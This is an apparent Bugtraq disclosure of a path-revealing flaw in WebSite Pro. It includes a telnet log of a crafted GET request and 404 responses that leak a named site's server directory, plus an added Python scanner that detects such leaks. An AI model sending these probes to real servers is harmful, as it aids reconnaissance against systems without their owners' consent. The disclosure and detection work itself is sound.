Dear Bugtraqers,
Description:
WebSite Pro also reveals the web directory of
each website through a simple command line.
This bug is similar to the "IIS revealing
webdirectories" bug reported on Bugtraq.
On WebSite Pro the difference is the way you
retrieve the path.
Example:
(Made with MS Windows Telnet Client)
Logfile:
-------------------------start-------------------------
GET /HTTP1.0\     <------ Our command we send via Telnet on port 80 to the webserver

Response:
Content-length: 186

<HTML><HEAD><TITLE>Document Moved</TITLE></HEAD>
<BODY bgcolor="White"><H2>Document Moved</H2>
This document has moved <A HREF="http://www.akte.net/HTTP1.0/">here</A>.<P>
</BODY></HTML>

GET /HTTP1.0/

Content-length: 230

<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not Found</H2>
The requested URL was not found on this server:<P><CODE>/HTTP1.0/<P>( D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P>
</BODY></HTML>
--------------------------end--------------------------
This shows us that the HTML files are in
D:\WEBROOTS\VHOSTS\aktenet\htdocs.
It's not a large threat, but an attacker might
gain information about the server which should stay
in the admin's hands. On all web servers, e.g.
MS IIS and Apache, the response is "error 404".
-------cut------
Elias: I have some html in this mail, try to send
it as clear text, as it is, please.
Else people with html capable browsers will only
get half of the logfile.
Thx :-)
------cut------
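
A defensive check for the leak shown in the logfile, as an added example that is not part of the original post: it scans captured error-page bodies for Windows drive or UNC paths and, where a leaked path ends with the requested URL path, reports the document root it implies. The function names are hypothetical; the first sample body is the 404 response quoted above, the second is constructed.

```python
import re
from html import unescape

# Windows drive path (D:\dir\file) or UNC path (\\host\share\dir).
# Whitespace ends a match, so a path containing spaces is reported truncated
# rather than swallowing the sentence around it.
_SEG = r"[^\\/:*?\"<>|()\s]+"
LOCAL_PATH = re.compile(
    r"(?<![A-Za-z0-9])(?:[A-Za-z]:\\|\\\\" + _SEG + r"\\)"
    + _SEG + r"(?:\\" + _SEG + r")*"
)

def implied_root(leaked_path, url_path):
    """Return the document root if leaked_path ends with the requested URL path."""
    suffix = url_path.strip("/").replace("/", "\\")
    trimmed = leaked_path.rstrip("\\")
    if suffix and trimmed.lower().endswith("\\" + suffix.lower()):
        return trimmed[: -len(suffix) - 1]
    return None

def audit_error_pages(captures):
    """captures: iterable of (requested_url_path, response_body) pairs."""
    findings = []
    for url_path, body in captures:
        for match in LOCAL_PATH.finditer(unescape(body)):
            path = match.group(0)
            findings.append({"url": url_path, "path": path,
                             "root": implied_root(path, url_path)})
    return findings

SAMPLES = [
    # 404 body as quoted in the post
    ("/HTTP1.0/",
     r'<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY bgcolor="White">'
     r'<H2>404 Not Found</H2> The requested URL was not found on this server:'
     r'<P><CODE>/HTTP1.0/<P>( D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE>'
     r'<P> </BODY></HTML>'),
    # constructed 404 body that discloses nothing
    ("/missing/",
     "<HTML><BODY><H2>404 Not Found</H2>The requested URL was not found "
     "on this server.</BODY></HTML>"),
]

if __name__ == "__main__":
    for finding in audit_error_pages(SAMPLES):
        print("%(url)s leaks %(path)s (document root: %(root)s)" % finding)
```
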
